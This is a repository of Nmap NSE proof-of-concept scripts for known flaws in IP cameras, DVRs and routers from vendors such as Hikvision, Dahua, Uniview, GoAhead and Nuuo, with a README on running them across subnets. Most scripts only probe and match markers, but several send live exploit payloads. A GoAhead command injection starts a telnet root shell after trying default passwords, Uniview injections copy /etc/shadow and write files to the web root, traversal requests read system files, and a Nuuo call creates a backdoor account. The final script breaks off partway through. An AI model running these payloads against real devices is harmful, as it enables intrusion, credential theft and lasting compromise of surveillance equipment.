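├── 28281
    └── gb28181_nodetect.nse
├── Cam
    └── cam_directorytraveral_03.nse
├── DaHua
    ├── dahua_backdoor.nse
    └── dahua_unauth_02.nse
├── Goahead
    ├── goahead_rce_01.nse
    └── goahead_unauth_01.nse
├── Hkvision
    ├── cnvd-2021-14544.nse
    ├── hikvision_7088_post.nse
    ├── hikvision_backdoor_05.nse
    ├── hikvision_information_leakage.nse
    └── hikvision_lfi_06.nse
├── LG
    ├── lg_infoleak_v1.nse
    └── lg_lfi.nse
├── Novo
    └── credentials_disclosure.nse
├── Nuuo
    └── nuuo_backdoor_06.nse
├── README.md
├── RG
    └── RG_UAC_information_leakage.nse
├── Uniview
    ├── uniview_dvr_rce_03.nse
    ├── uniview_infoleak_01.nse
    └── uniview_rce_02.nse
├── XiongMai
    └── xiong-mai-60001.nse
├── onvif
    ├── onvif_anonymouse_access_detect.nse
    └── onvif_post_timecomparion.nse
├── script.db
└── velotismart
    └── velotismart_directory_traversal.nse


/28281/gb28181_nodetect.nse:
--------------------------------------------------------------------------------
local shortport = require "shortport";
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local vulns = require "vulns"
local nmap = require "nmap"


description = [[
检测目标视频设备是否配置了GB28181
]]

author = "seaung"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"

-- NOTE(review): none of these names is a standard NSE category (auth, default,
-- discovery, exploit, intrusive, safe, vuln, ...). The same holds for every
-- script in this listing, so category filters built on the standard names do
-- not describe how intrusive a given check is.
categories = {"GB28181", "GB28181_nodetect", "vuln_detect"}

portrule = shortport.port_or_service( {554, 5060, 5061}, {"rtsp","sip"}, {"tcp", "udp"} )

--- Flag a host whose RTSP port is reachable while neither SIP port is.
-- Reads the states Nmap recorded for 554/tcp, 5060/udp and 5061/udp.
-- NOTE(review): get_port_state presumably returns nil for a port that was not
-- scanned, so without a UDP scan of 5060/5061 every host with 554/tcp open
-- would be reported; confirm before relying on the verdict.
-- @param host NSE host table
-- @param port NSE port table (not used)
-- @return verdict string
action = function(host, port)
  -- True when the recorded state is "open" or "open|filtered".
  local function reachable(number, protocol)
    local entry = nmap.get_port_state(host, {number = number, protocol = protocol})
    return entry ~= nil and (entry.state == "open" or entry.state == "open|filtered")
  end

  local rtsp_seen = reachable(554, "tcp")
  local sip_seen = reachable(5060, "udp") or reachable(5061, "udp")

  if rtsp_seen and not sip_seen then
    return "Found vulnerable.".."Target video device is not configured GB28181"
  end
  return "Not vulnerable"
end
--------------------------------------------------------------------------------
/Cam/cam_directorytraveral_03.nse:
--------------------------------------------------------------------------------
local http = require "http"
local string = require "string"
local stdnse = require "stdnse"
local shortport = require "shortport"

author = "seaung"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "CAM", "cam_directorytraveral_03", "vuln_detect" }

description = [[
CVE:CVE-2014-1900
Desc:Y-cam存在目录遍历漏洞,未授权攻击者可以通过目录遍历来绕过认证,
并获得管理员的凭证,访问/./en/account/accedit.asp?item=0即可查看管理
员凭证
Affected:YCB001, YCW001,YCB002, YCK002, YCW003
]]

portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")

--- Request the account page and look for two credential markers in the reply.
-- NOTE(review): "admin" and "1234" are short, generic substrings; any 200
-- response that contains both is reported, so a positive needs manual
-- confirmation before it is treated as a finding.
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  local response = http.get(host, port, "/./en/account/accedit.asp?item=0")
  local body = response.body

  -- A missing body is treated as a negative instead of raising inside string.find.
  if response.status ~= 200 or type(body) ~= "string" then
    return "Not Vulnerable"
  end
  if string.find(body, "admin") ~= nil and string.find(body, "1234") ~= nil then
    return "Found Vulnerable"
  end
  return "Not Vulnerable"
end

--------------------------------------------------------------------------------
/DaHua/dahua_backdoor.nse:
--------------------------------------------------------------------------------
local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
local string = require "string"


description = [[
大华视频设备后门文件漏洞,影响的设备型号如下:
DH-IPC-HDW23A0RN-ZS
DH-IPC-HDBW23A0RN-ZS
DH-IPC-HDBW13A0SN
DH-IPC-HDW13A0SN
DH-IPC-HFW13A0SN-W
DH-IPC-HDBW13A0SN
DH-IPC-HDW13A0SN
DH-IPC-HFW13A0SN-W
DHI-HCVR51A04HE-S3
DHI-HCVR51A08HE-S3
DHI-HCVR58A32S-S2
]]

author = "seaung"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"

categories = { "dahua", "dahua_backdoor", "vuln_detect" }

portrule = shortport.port_or_service( {80, 443, 8080, 8090, 8088}, {"http", "https"}, "tcp", "open")


--- Fetch /current_config/passwd and report when both field markers appear.
-- The response body is only inspected for the two markers; it is not returned.
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  local options = {
    header = {
      ["Connection"] = "close",
      ["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8",
      ["Accept"] = "*/*",
      ["X-Requested-With"] = "XMLHttpRequest",
      ["X-Request"] = "JSON",
      ["User-Agent"] = "DAHUA-dhdev/1.0",
    },
  }

  local resp = http.get(host, port, "/current_config/passwd", options)
  local body = resp.body

  if resp.status == 200 and type(body) == "string"
      and string.find(body, "Password") ~= nil
      and string.find(body, "Sharable") ~= nil then
    return "Found vulnerable."
  end
  return "Not vulnerable."
end

--------------------------------------------------------------------------------
/DaHua/dahua_unauth_02.nse:
--------------------------------------------------------------------------------
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"


description = [[
大华摄像头 IPC-HF2100 2.420.0000.0.R onvif 协议身份认证漏洞,
攻击者通过onvif协议的snapshot接口绕过身份认证,直接获得摄像头实时视频图像。
]]

author = "seaung"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "dahua", "dahua_unauth_02", "vuln_detect" }

portrule = shortport.port_or_service( {80, 443, 8080, 8090, 8088}, {"http", "https"}, "tcp", "open")

--- Request the ONVIF snapshot path and report on a 200 reply without "404".
-- NOTE(review): the first marker is the empty pattern, which matches every
-- string, so the verdict rests only on status 200 and the absence of "404".
-- The intended marker looks lost; expect false positives until it is restored.
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  local path = "/*/onvifsnapshot/*/"
  local options = {
    header = {
      ["Connection"] = "close",
      ["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8",
      ["Accept"] = "*/*",
      ["X-Requestd-With"] = "XMLHttpRequest",
      ["X-Request"] = "JSON",
      ["User-Agent"] = "DAHUA-dhdev/1.0",
    },
  }

  -- NOTE(review): the fifth argument is presumably ignored by http.get, so
  -- no_cache may not take effect here; confirm against the http library.
  -- resp and body were assigned as globals in the original; they are locals now.
  local resp = http.get(host, port, path, options, {no_cache = true})
  local body = resp.body

  if resp.status == 200 and type(body) == "string"
      and string.match(body, "") and not string.match(body, "404") then
    return "Found vulnerable."
  end
  return "Not vulnerable."
end

--------------------------------------------------------------------------------
/Goahead/goahead_rce_01.nse:
--------------------------------------------------------------------------------
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local nmap = require "nmap"


description = [[
GoAhead系列
经过身份认证后可执行系统命令
]]


author = "seaung"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"

-- NOTE(review): this check changes state on the target (see action) but is not
-- tagged "intrusive" or "exploit", so a selection such as
-- `--script "not intrusive"` would not exclude it.
categories = { "goahead", "goahead_rce_01", "vuln_detect" }

portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")

--- Try each built-in user/password pair against set_ftp.cgi, then test 25/tcp.
-- NOTE(review): every request asks the device to start a listener, so a device
-- that accepts one is presumably left with that service running after the
-- scan; treat positives as hosts that need clean-up as well as patching.
-- NOTE(review): the verdict is overwritten on every iteration, so the returned
-- string reflects only the last pair tried; a negative is weak evidence.
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string, or an empty output table when no pair was tried
action = function(host, port)
  stdnse.verbose("[*] Starting check vulnreable.")

  local users = {"admin", "root"}
  local pawds = {"12345", "123456", "admin", "qwe123"}

  local output = stdnse.output_table()

  for _, user in ipairs(users) do
    for _, password in ipairs(pawds) do
      local path = string.format([[/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0]], user, password)
      local response = http.get(host, port, path)

      if response.status == 200 then
        -- The socket was a global in the original; it is scoped to this attempt now.
        local sock = nmap.new_socket()
        sock:set_timeout(10)
        local connected = sock:connect(host.ip, 25)
        sock:close()
        if connected then
          output = "Found vulnerable."
        else
          output = "Not vulnerable."
        end
      else
        output = "Not vulnerable."
      end
    end
  end

  return output

end


--------------------------------------------------------------------------------
/Goahead/goahead_unauth_01.nse:
--------------------------------------------------------------------------------
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"

description = [[
GoAhead系列
只要访问地址(url)中含有loginuse和loginpas这两个值即攻击者可绕过认证导致信息(登录凭据)泄漏漏洞
]]

author = "seaung"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"

categories = { "goahead", "goahead_unauth_01", "vuln_detect" }

portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")

--- Request system.ini with empty login parameters and look for "IPCAM".
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  -- stdnse.verbose("[*] Starting check vulnreable.")

  local response = http.get(host, port, "/system.ini?loginuse&loginpas")
  local body = response.body

  if response.status == 200 and type(body) == "string"
      and string.find(body, "IPCAM") ~= nil then
    return "Found vulnerable."
  end
  return "Not vulnerable."
end

--------------------------------------------------------------------------------
/Hkvision/cnvd-2021-14544.nse:
--------------------------------------------------------------------------------
local http = require "http"
local string = require "string"
local stdnse = require "stdnse"
local shortport = require "shortport"

description = [[
杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞,
攻击者可利用该漏洞登录后台通过文件遍历漏洞获取敏感信息
]]

author = "seaung"


license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "hikvision", "cnvd-2021-14544", "vuln_detect" }


portrule = shortport.port_or_service({ 80, 443, 4444, 8000, 8080, 8443, 9000, 9001, 9090 }, { "http", "https" }, "tcp", "open")


--- Request a Windows system file through downFile.php and look for "drivers".
-- Only the traversal request is made; the weak-password part of the
-- description is not exercised by this code.
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  local path = "/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini"
  local response = http.get(host, port, path)
  local body = response.body

  if response.status == 200 and type(body) == "string"
      and string.find(body, "drivers") ~= nil then
    return "[+] Found vulnerable"
  end
  return "[-] Not Found vulnerable"
end
--------------------------------------------------------------------------------
/Hkvision/hikvision_7088_post.nse:
--------------------------------------------------------------------------------
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"


description = [[
海康视频设备接入网关账号信息泄露.
]]

author = "seaung"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "hikvision", "hikvision_7088_post", "vuln_detect" }

portrule = shortport.port_or_service( {7788,7288}, {"http", "https"}, "tcp", "open")

--- POST a user-list query and report when the reply names accounts and passwords.
-- NOTE(review): on a match the whole response body is copied into the script
-- output, so scan reports from this check contain the disclosed account data
-- and need the same handling as the credentials themselves.
-- @param host NSE host table
-- @param port NSE port table
-- @return output table; left empty when the markers are not found
action = function(host, port)

  local output_tab = stdnse.output_table()
  local path = "/data/userInfoDate.php"
  local exploit = [[page=1&rows=20&sort=userId&order=asc]]
  local options = {header={["Content-Type"]='application/x-www-form-urlencoded'}}
  local response = http.post(host, port, path, options, nil, exploit)
  local body = response.body

  if response.status == 200 and type(body) == "string"
      and string.match(body, "name") and string.match(body, "password") then
    output_tab.yd_cmd1 = "/data/userInfoDate.php".." ".."Found vulnerable."
    output_tab.yd_rbody1 = body
  end

  return output_tab

end

--------------------------------------------------------------------------------
/Hkvision/hikvision_backdoor_05.nse:
--------------------------------------------------------------------------------
local http = require "http"
local string = require "string"
local stdnse = require "stdnse"
local shortport = require "shortport"


description = [[
Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - 访问控制绕过
后门文件,可用于重置密码
]]


author = "seaung"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "hikvision", "hikvision_backdoor_05", "vuln_detect" }

portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")

--- Request the user list with a fixed auth query parameter and check the reply.
-- NOTE(review): "id" is a very short marker; the verdict effectively depends
-- on "userName" appearing in a 200 response.
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  local back_door_auth_args = "auth=YWRtaW46MTEK"
  local base_url = "/Security/users?"
  local uri = base_url..back_door_auth_args

  local response = http.get(host, port, uri)
  -- The body was stored in a global named content in the original.
  local content = response.body

  if response.status == 200 and type(content) == "string"
      and string.find(content, "id") and string.find(content, "userName") ~= nil then
    return "Found vulnerable."
  end
  return "Not vulnerable."

end

--------------------------------------------------------------------------------
/Hkvision/hikvision_information_leakage.nse:
--------------------------------------------------------------------------------
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"


author = "seaung"

description = [[
Hikvision DV 泄露web版本信息
]]

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"

categories = { "hikvision", "hikvision_information_leakage", "vuln_detect" }

portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")

--- Read sea-config.js and extract the web and plugin version strings.
-- @param host NSE host table
-- @param port NSE port table
-- @return output table with yd_info and, on a match, the two version fields
action = function(host, port)
  local output = stdnse.output_table()
  local path = "/doc/script/lib/seajs/config/sea-config.js?version="

  local response = http.get(host, port, path)
  local body = response.body

  if response.status ~= 200 then
    output.yd_info = "Bad Request"
    return output
  end

  if type(body) == "string"
      and string.find(body, "seajs.web_version") ~= nil
      and string.find(body, "seajs.plugin_version") ~= nil then
    -- Field order is kept as in the original so the report layout is unchanged.
    output.yd_web_version = string.match(body, "(%u%w.%w.%d%a+%d+)")
    output.yd_plugin_version = string.match(body, "(%u%w.%d+.%d+.%d+)")
    output.yd_info = "Found vulnerable"
  else
    output.yd_info = "Not vulnerable"
  end
  return output
end

--------------------------------------------------------------------------------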
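/Hkvision/hikvision_lfi_06.nse:
--------------------------------------------------------------------------------
local http = require "http"
local string = require "string"
local stdnse = require "stdnse"
local shortport = require "shortport"


description = [[
海康威视某系列控制台文件包含导致getshell
在controller参数的一个任意文件包含:包含日志文件getshell
]]


author = "seaung"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- NOTE(review): none of these names is a standard NSE category (auth, default,
-- discovery, exploit, intrusive, safe, vuln, ...). The same holds for the other
-- scripts in this listing, so category filters built on the standard names do
-- not describe how intrusive a given check is.
categories = { "hikvision", "hikvision_lfi_06", "vuln_detect" }

portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")

--- Request the error log through the controller parameter and look for "Venus01".
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  stdnse.verbose("[*] start check vulnerable.")
  local payload = "/index.php?controller=../../../../Server/logs/error.log%00.php"

  local response = http.get(host, port, payload)
  -- The body was stored in a global named content in the original.
  local content = response.body

  if response.status == 200 and type(content) == "string"
      and string.find(content, "Venus01") ~= nil then
    return "Found vulnerable."
  end
  return "Not vulnerable."
end

--------------------------------------------------------------------------------
/LG/lg_infoleak_v1.nse:
--------------------------------------------------------------------------------
local http = require "http"
local string = require "string"
local stdnse = require "stdnse"
local shortport = require "shortport"


description = [[
. LG DVR LE6016D
未认证远程获取用户/密码
]]

author = "seaung"

-- The original URL read "namp.org"; corrected to the nmap.org address that the
-- other scripts in this listing use.
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "LG", "lg_infoleak_v1", "vuln_detect" }

portrule = shortport.http


--- Request user.cgi and report when the reply carries <name> and <pw> elements.
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  local response = http.get(host, port, "/dvr/wwwroot/user.cgi")
  local body = response.body

  if response.status == 200 and type(body) == "string"
      and string.find(body, "<name>") ~= nil
      and string.find(body, "<pw>") ~= nil then
    return "[+] Found vulnerable."
  end
  return "[-] Not Found vulnerable."
end

--------------------------------------------------------------------------------
/LG/lg_lfi.nse:
--------------------------------------------------------------------------------
local http = require "http"
local string = require "string"
local stdnse = require "stdnse"
local shortport = require "shortport"


description = [[
Desc:LG DVR LE6016D存在敏感信息泄露漏洞,
未认证用户只需要发起一个请求链接即可访问系统敏感文件,
如/etc/passwd, /etc/shadow
Tested:LG DVR LE6016D
]]


author = "seaung"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "LG", "lg_lfi", "vuln_detect" }


portrule = shortport.http

--- Request /etc/passwd over HTTP and look for "root" in the reply.
-- NOTE(review): "root" is a generic substring; a 200 error page or index that
-- happens to contain it is reported too, so positives need confirmation.
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  local response = http.get(host, port, "/etc/passwd")
  local body = response.body

  if response.status == 200 and type(body) == "string"
      and string.find(body, "root") ~= nil then
    return "[+] Found vulnerable."
  end
  return "[-] Not Found vulnerable."
end

--------------------------------------------------------------------------------
/Novo/credentials_disclosure.nse:
--------------------------------------------------------------------------------
local http = require "http"
local string = require "string"
local stdnse = require "stdnse"
local shortport = require "shortport"

description = [[
Desc:Novo DVR存在凭证泄露问题,
攻击者精心构造链接,
修改cookie信息即可查看返回的登录凭证信息。
]]

author = "seaung"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "Novo", "credentials_disclosure", "vuln_detect" }

portrule = shortport.http

--- Request the user list and report when the reply contains "admin" and "pwd".
-- NOTE(review): the other scripts in this listing pass request headers under
-- the key `header`; this one uses `headers`, which the http library presumably
-- ignores. Confirm before treating a negative result as evidence the device is
-- not affected.
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  local path = "/device.rsp?opt=user&cmd=list"
  local options = {headers={}}
  options["headers"]["cookie"] = "uid=admin"

  local response = http.get(host, port, path, options)
  local body = response.body

  if response.status == 200 and type(body) == "string"
      and string.find(body, "admin") ~= nil
      and string.find(body, "pwd") ~= nil then
    return "[+] Found vulnerable."
  end
  return "[-] Not Found vulnerable."
end
--------------------------------------------------------------------------------
/Nuuo/nuuo_backdoor_06.nse:
--------------------------------------------------------------------------------
local http = require "http"
local string = require "string"
local stdnse = require "stdnse"
local shortport = require "shortport"

author = "seaung"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- NOTE(review): per the description below, calling strong_user.php creates an
-- account on the device. That makes this check state-changing, but it is not
-- tagged "intrusive", so `--script "not intrusive"` would not exclude it.
categories = { "Nuuo", "nuuo_backdoor_06", "vuln_detect" }


description = [[
version: <=3.0.8
设备有一个隐藏的PHP脚本,在调用时,会创建一个具有poweruser权限的后门用
户,该权限可以在受影响的设备上读写文件。 使用密码“111111”通过访问“strong_user.php”
脚本创建后门用户“bbb”能够启动安全shell会话并进一步窃取和或破坏敏感信息。
]]

portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")

--- Request strong_user.php and report when both expected strings come back.
-- NOTE(review): a device that tests positive presumably ends up with the
-- account the description mentions; removing it belongs in the remediation.
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  local r = http.get(host, port, "/strong_user.php")
  local body = r.body

  if r.status == 200 and type(body) == "string"
      and string.find(body, "Read Passwd") ~= nil
      and string.find(body, "Username: root") ~= nil then
    return "Found Vulnerable"
  end
  return "Not Vulnerable"
end


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
#### 关于
这里是专门收集各大监控摄像头和路由器漏洞的POC仓库


#### 怎么使用

在使用这些脚本之前,请将script.db文件覆盖掉nmap默认的script.db文件
将所有的脚本放置到nmap的脚本目录下

```
# 运行全部的脚本
nmap --script vuln-detect 0.0.0.0/24


# 运行海康摄像头漏洞检测脚本
nmap --script hkvision 0.0.0.0/24


# 运行锐捷摄像头漏洞检测脚本
nmap --script ruijie 0.0.0.0/24


# 运行LG摄像头漏洞检测脚本
nmap --script LG 0.0.0.24
```

---
that's all
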
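--------------------------------------------------------------------------------
/RG/RG_UAC_information_leakage.nse:
--------------------------------------------------------------------------------
local http = require "http"
local string = require "string"
local stdnse = require "stdnse"
local shortport = require "shortport"


description = [[
锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,
可以间接获取用户账号密码信息登录后台
]]

author = "seaung"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- NOTE(review): none of these names is a standard NSE category (auth, default,
-- discovery, exploit, intrusive, safe, vuln, ...). The same holds for the other
-- scripts in this listing, so category filters built on the standard names do
-- not describe how intrusive a given check is.
categories = { "ruijie", "RG_UAC_information_leakage", "vuln_detect" }

portrule = shortport.port_or_service({80, 443, 8000, 8080, 8443}, { "http", "https" }, "tcp", "open")

--- Fetch the front page and report when it contains both account markers.
-- The original tested the body before the status, so a failed request (no
-- body) raised inside string.find; the status and body are checked first now.
-- NOTE(review): the other scripts in this listing pass request headers under
-- `header`; the `headers` table used here is presumably ignored, so the
-- user-agent below may not be sent. Confirm against the http library.
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  local options = {headers={}}
  options["headers"]["user-agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
  local response = http.get(host, port, "/", options)
  local body = response.body

  if response.status == 200 and type(body) == "string"
      and string.find(body, "super_admin") ~= nil
      and string.find(body, "password") ~= nil then
    return "[+] Found vulnerable"
  end
  return "Not Found vulnerable"
end
--------------------------------------------------------------------------------
/Uniview/uniview_dvr_rce_03.nse:
--------------------------------------------------------------------------------
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"


description = [[
宇视视频(DVR/NVR)远程命令执行漏洞
影响设备型号:ECR3316_HF ECR3316-HF ECR3308_HF ECR3308-HF ISC3500E ISC3500E ISC3500S ISC3500S ECR3316_HF_E ECR3316-HF-E ECR3308 _HF_E ECR3308-HF-E
ECR3316_HF_S ECR3316-HF-S ECR3308_HF_S ECR3308-HF-S ISC3500_ET ISC3500-ET ISC3500_EL ISC3500-EL ISC3500_ST ISC3500-ST ISC3500_SL ISC3500-SL
ECR2104_HF ECR2104-HF ECR2108_HF ECR2108-HF ISC2500_SP ISC2500-SP ISC2500_EP ISC2500-EP ISC2500_E ISC2500-E ISC2500_S ISC2500-S ISC2500_L
ISC2500-L ECR3308_HF_SC ECR3308-HF-SC ECR3316_HF_SC ECR3316-HF-SC ISC3500_LC ISC3500-LC ISC3500_SC ISC3500-SC ISC3500_EC ISC3500-EC ISC5000-E
]]

author = "seaung"


license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- NOTE(review): the first request below writes a file on the target, yet the
-- script is not tagged "intrusive" or "exploit"; `--script "not intrusive"`
-- would not exclude it.
categories = { "uniview", "uniview_dvr_nvr_rce_03", "vuln_detect" }

portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")

--- Send the setDNSServer request, then fetch the file it names and inspect it.
-- NOTE(review): the verdict comes from a "<title>" marker and the absence of
-- "404" in the second response, not from the content the first request asks
-- the device to write, so an HTML page at that path also reports positive.
-- NOTE(review): a device that accepts the first request is presumably left
-- with yzkx.php in its web root; removing it belongs in the clean-up.
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  local url1 = [[/Interface/DevManage/VM.php?cmd=setDNSServer&DNSServerAdrr=" | whoami >/usr/local/program/ecrwww/apache/htdocs/Interface/DevManage/yzkx.php]]
  local url2 = "/Interface/DevManage/yzkx.php"
  local options = {
    header = {
      ["Accept"] = "*/*",
      ["Accept-Language"] = "en-US,en;q=0.8",
      ["Cache-Control"] = "max-age=0",
      ["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36",
      ["Connection"] = "keep-alive",
    },
  }

  -- The first response is not inspected; only the follow-up request is.
  http.get(host, port, url1, options)
  local res2 = http.get(host, port, url2, options)

  -- The body was stored in a global in the original.
  local body = res2.body

  if res2.status == 200 and type(body) == "string"
      and string.match(body, "<title>") and not string.match(body, "404") then
    return "Found vulnerable."
  end
  return "Not vulnerable."
end

--------------------------------------------------------------------------------
/Uniview/uniview_infoleak_01.nse:
--------------------------------------------------------------------------------
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"


description = [[
宇视视频设备配置信息泄露漏洞,影响的设备型号如下:
NVR304-16E NVR301-08-P8
攻击者无需身份验证即可访问配置信息
]]


author = "seaung"


license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "uniview", "uniview_infoleak_01", "vuln_detect" }

portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")

--- Send the cmd 265 query and report when the reply contains "UserCfg" and "Num".
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  local path = [[/cgi-bin/main-cgi?json={"cmd":265,"szUserName":"","u32UserLoginHandle":8888888888}]]

  local res = http.get(host, port, path)
  local body = res.body

  if res.status == 200 and type(body) == "string"
      and string.find(body, "UserCfg") ~= nil and string.find(body, "Num") then
    return "Found vulnerable."
  end
  return "Not vulnerable."
end

--------------------------------------------------------------------------------
/Uniview/uniview_rce_02.nse:
--------------------------------------------------------------------------------
local http = require "http"
local string = require "string"
local stdnse = require "stdnse"
local shortport = require "shortport"


description = [[
宇视视频设备认证绕过远程命令执行漏洞,影响的设备型号如下:
NVR304-16E NVR301-08-P8
攻击无需通过身份验证既可以远程执行命令
]]

author = "seaung"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- NOTE(review): the first request below makes the device copy its shadow file,
-- yet the script is not tagged "intrusive" or "exploit";
-- `--script "not intrusive"` would not exclude it.
categories = { "uniview", "uniview_rce_02", "vuln_detect" }

portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")

--- Send the cmd 264 request, then the cmd 265 query, and inspect the second reply.
-- NOTE(review): a device that accepts the first request is presumably left
-- with a copy of /etc/shadow at /tmp/packetcapture.pcap; clean-up of a
-- positive host should cover that file as well as the patch.
-- NOTE(review): `"success": true` alone is enough for a positive, so the
-- verdict does not prove the copy took place.
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  local path = [[/cgi-bin/main-cgi?json={"cmd":264,"status":1,"bSelectAllPort":1,"stSelPort":0,"bSelectAllIp":1,"stSelIp":0,"stSelNicName":";cp /etc/shadow /tmp/packetcapture.pcap;]]

  local response = http.get(host, port, path)
  if response.status ~= 200 then
    return "Not vulnerable."
  end

  local url = [[/cgi-bin/main-cgi?json={"cmd":265,"szUserName":"","u32UserLoginHandle":-1}]]
  local resp = http.get(host, port, url)
  local body = resp.body

  -- A missing body is treated as a negative instead of raising inside string.find.
  if type(body) == "string"
      and (string.find(body, [["success": true]]) ~= nil or string.find(body, [[root:]]) ~= nil) then
    return "Found vulnerable."
  end
  return "Not vulnerable."
end

--------------------------------------------------------------------------------
/XiongMai/xiong-mai-60001.nse:
--------------------------------------------------------------------------------
local http = require "http"
local string = require "string"
local stdnse = require "stdnse"
local shortport = require "shortport"

author = "seaung"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "xiongmai", "xiongmai_60001", "vuln_detect" }

description = [[
雄迈视频设备存在后台管理页面,端口60001,易受到口令爆破攻击。
]]

portrule = shortport.port_or_service( {60001}, {"http", "https"}, "tcp", "open")

--- Fetch "/" and "/view2.html" and report when the management UI markers appear.
-- This identifies the exposed management page only; no login is attempted.
-- @param host NSE host table
-- @param port NSE port table
-- @return verdict string
action = function(host, port)
  local r = http.get(host, port, "/")
  local r1 = http.get(host, port, "/view2.html")

  if r.status ~= 200 or r1.status ~= 200 then
    return "Not Vulnerable"
  end
  if type(r.body) ~= "string" or type(r1.body) ~= "string" then
    return "Not Vulnerable"
  end

  if string.find(r.body, "onDblClick") ~= nil
      and string.find(r.body, "Network video client") ~= nil
      and string.find(r1.body, "view2.js") ~= nil then
    return "Found Vulnerable"
  end
  return "Not Vulnerable"

end
--------------------------------------------------------------------------------
/onvif/onvif_anonymouse_access_detect.nse:
--------------------------------------------------------------------------------
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local vulns = require "vulns"

description = [[
检测视频设备是否存在onvif类接口的匿名访问漏洞..
]]

author = "seaung"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln_detect", "onvif_anonymouse_access_detect"}

portrule = shortport.port_or_service({80, 443}, {"http", "https"}, "tcp", "open")

--- POST an unauthenticated ONVIF GetScopes request and check for a SOAP envelope.
-- NOTE(review): any 200 reply that closes a SOAP envelope is reported; the
-- body is not checked for a fault element, so a 200 SOAP fault reports positive.
-- @param host NSE host table
-- @param port NSE port table
-- @return output table with a `display` verdict
action = function(host, port)

  local output_tab = stdnse.output_table()

  local path = "/onvif/device_service"
  local exploit = [[<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"><s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><GetScopes xmlns="http://www.onvif.org/ver10/device/wsdl"/></s:Body></s:Envelope>]]
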